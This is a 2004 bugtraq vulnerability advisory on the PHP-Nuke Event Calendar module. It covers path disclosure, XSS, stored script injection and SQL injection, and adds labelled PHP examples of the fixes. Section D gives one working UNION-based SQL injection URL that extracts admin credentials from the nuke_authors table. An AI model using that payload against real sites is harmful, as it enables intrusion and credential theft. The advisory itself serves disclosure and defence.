
List:       bugtraq
Subject:    [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-11-16 23:04:21
Message-ID: 20041117042243.23012.qmail () www ! securityfocus ! com

{================================================================================}
{                              [waraxe-2004-SA#038]                              }
{================================================================================}
{                                                                                }
{         [ Multiple vulnerabilities in Event Calendar module for PhpNuke ]      }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.
Author's Email: phpnuke@holbrookau.net

Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated and features many improvements and add-ons. For example, the administration area features configuration via a graphical interface, posting of events can be moderated, and users even have the option of adding comments to any event.

Homepage: http://phpnuke.holbrookau.net/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece of software has many security-related flaws due to poor handling of user-submitted data.


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19


A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php
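All three path-disclosure cases have the same root cause: config.php, index.php and submit.php can be requested directly, so the include() calls that only resolve when the file is loaded through modules.php fail, and PHP prints the warning together with the absolute path. As an added example (not code from the advisory or from the Event Calendar module), the guard below refuses direct requests, and the ini settings keep warnings out of the response even if a guard is missed. The marker constant NUKE_FILE and the check against modules.php are assumptions about how the host application loads its modules.

```php
<?php
// Added example, not part of the Event Calendar module or the advisory.
// Intended for the top of each module file (config.php, index.php, submit.php)
// that is only meant to be loaded through modules.php.

// Guard 1 (assumption: the front controller defines a marker constant before
// including module files). A direct request never sees the constant and is
// rejected before any include() can fail and print an absolute path.
if (!defined('NUKE_FILE')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access to this file is not allowed.');
}

// Guard 2: for deployments with no marker constant. The script name of a
// legitimate request is modules.php, not the module file itself.
if (basename($_SERVER['SCRIPT_NAME']) !== 'modules.php') {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access to this file is not allowed.');
}

// Independently of any guard, a production host should never echo PHP
// warnings to clients. Equivalent php.ini lines:
//   display_errors = Off
//   log_errors = On
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

The guards stop the disclosure at its source; the ini settings are the defence that still holds when a new module file is added without a guard, so both belong in a fix.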


B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss code here]


C - script injection in calendar event comments:

This is a serious bug: anyone can insert JavaScript into event comments, and when a user or admin reads the comment, the script executes and bad things can happen, like cookie theft, arbitrary admin operations, etc.
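Sections B and C are the two faces of the same defect: untrusted input reaches HTML output unencoded, either reflected straight from the preview parameters or stored in a comment and replayed to every later reader. The following is an added example, not code from the advisory or from the Event Calendar module. It validates the submit/preview parameters named in section B by type and range, and encodes stored comment text on output for section C. The parameter names day, month, year and type come from the advisory; the allowed values for type and the comment markup are constructed for illustration.

```php
<?php
// Added example, not code from the advisory or the Event Calendar module.
// Section B: validate the submit/preview parameters instead of echoing them.
// Section C: encode stored comment text on every output.

// Numeric fields: accept only digit strings within a sane range, otherwise
// fall back to today's value. A tag or script payload never survives the cast.
function clean_date_part($value, $min, $max, $default) {
    if (!is_string($value) || !ctype_digit($value)) {
        return $default;
    }
    $n = (int)$value;
    return ($n >= $min && $n <= $max) ? $n : $default;
}

// Enumerated field: whitelist rather than escape. The set of event types is an
// assumption; the real module may use different names.
function clean_type($value) {
    $allowed = array('personal', 'public', 'holiday');
    return in_array($value, $allowed, true) ? $value : 'public';
}

function clean_preview_params(array $get) {
    $g = function ($k) use ($get) { return isset($get[$k]) ? $get[$k] : ''; };
    return array(
        'day'   => clean_date_part($g('day'),   1,    31,   (int)date('j')),
        'month' => clean_date_part($g('month'), 1,    12,   (int)date('n')),
        'year'  => clean_date_part($g('year'),  1970, 2100, (int)date('Y')),
        'type'  => clean_type($g('type')),
    );
}

// Section C: encode at the point of output, regardless of what was stored.
// ENT_QUOTES also closes the attribute-context breakout; the charset must match
// the page's declared encoding.
function render_comment($raw) {
    return '<div class="comment">' . htmlspecialchars($raw, ENT_QUOTES, 'UTF-8') . '</div>';
}

// Constructed demonstration input of the shape described in sections B and C.
$hostile_get = array(
    'day'   => '<script>alert(1)</script>',
    'month' => '13',
    'year'  => '2004',
    'type'  => '<b>x</b>',
);
print_r(clean_preview_params($hostile_get)); // day/month fall back, year 2004, type public
echo render_comment('<script>alert(1)</script>'), "\n";
// Output: <div class="comment">&lt;script&gt;alert(1)&lt;/script&gt;</div>
```

Validating on input and encoding on output are not alternatives: the date fields are validated because they have a narrow legal form, while free-text comments cannot be validated into safety and must be encoded for the HTML context they are written into.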


D - critical sql injection bugs in code:

A close look at the source code reveals multiple SQL queries in which some variables, mostly "$eid" and "$cid", ARE NOT surrounded with single quotes. Therefore SQL injection is possible. Further exploitation will depend on the database software and version. With MySQL 4.x and UNION functionality enabled, arbitrary data can be retrieved from the database, including the admin(s) authentication credentials. As is tradition, here is a proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------
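The detail that matters in section D is the missing quotes: when a value is interpolated into SQL as a bare number, quote-escaping (addslashes, magic_quotes) has nothing to act on, so the usual PHP-Nuke-era defence is silent and a UNION is simply appended to the query. The following added example (not code from the advisory or from the Event Calendar module) puts the vulnerable pattern beside two hardened forms; the table and column names are hypothetical and the mysqli connection is assumed to exist.

```php
<?php
// Added example, not code from the advisory or the Event Calendar module.
// Table and column names are hypothetical.

// VULNERABLE: $eid goes into the SQL unquoted and unvalidated. With no quotes
// around it, addslashes()/magic_quotes do nothing, because the payload contains
// no quote character to escape; the UNION becomes part of the statement.
function event_query_vulnerable($eid) {
    return "SELECT * FROM nuke_calendar_events WHERE eid=" . $eid;
}

// HARDENED (drop-in for legacy string-built queries): force an integer before
// interpolating. intval() keeps the leading number and discards the rest, so
// the query text can never contain injected SQL.
function event_query_hardened($eid) {
    $eid = intval($eid);
    return "SELECT * FROM nuke_calendar_events WHERE eid=" . $eid;
}

// Stricter: reject rather than coerce, so a non-numeric eid can be logged as an
// attack instead of silently becoming -99.
function validate_id($value) {
    if (!is_string($value) || !ctype_digit($value) || strlen($value) > 10) {
        return null;
    }
    return (int)$value;
}

// PREFERRED: a parameterized query, so the driver keeps data and SQL apart.
// Assumes a mysqli connection with mysqlnd (needed for get_result()).
function fetch_event(mysqli $db, $eid) {
    $id = validate_id($eid);
    if ($id === null) {
        error_log('calendar: rejected non-numeric eid ' . var_export($eid, true));
        return null;
    }
    $stmt = $db->prepare('SELECT eid, title FROM nuke_calendar_events WHERE eid = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc();
}

// Demonstration with a constructed payload of the shape shown in the advisory.
$payload = '-99 UNION ALL SELECT 1,1,aid,1,pwd FROM nuke_authors';
echo event_query_vulnerable($payload), "\n"; // UNION survives into the SQL
echo event_query_hardened($payload), "\n";   // ... WHERE eid=-99
var_dump(validate_id($payload));              // NULL: rejected outright
var_dump(validate_id('42'));                  // int(42)
```

The intval() form is the smallest patch for a code base that builds every query as a string, which is why it was the usual fix at the time; the prepared statement is the durable one, and the reject-and-log variant additionally gives the site operator a signal that someone is probing the parameter.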


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004

Since then there has been no further response from the software developer, and the downloadable version is still unpatched.

For help with patching, look here - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Greetings - Heintz and Maku!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

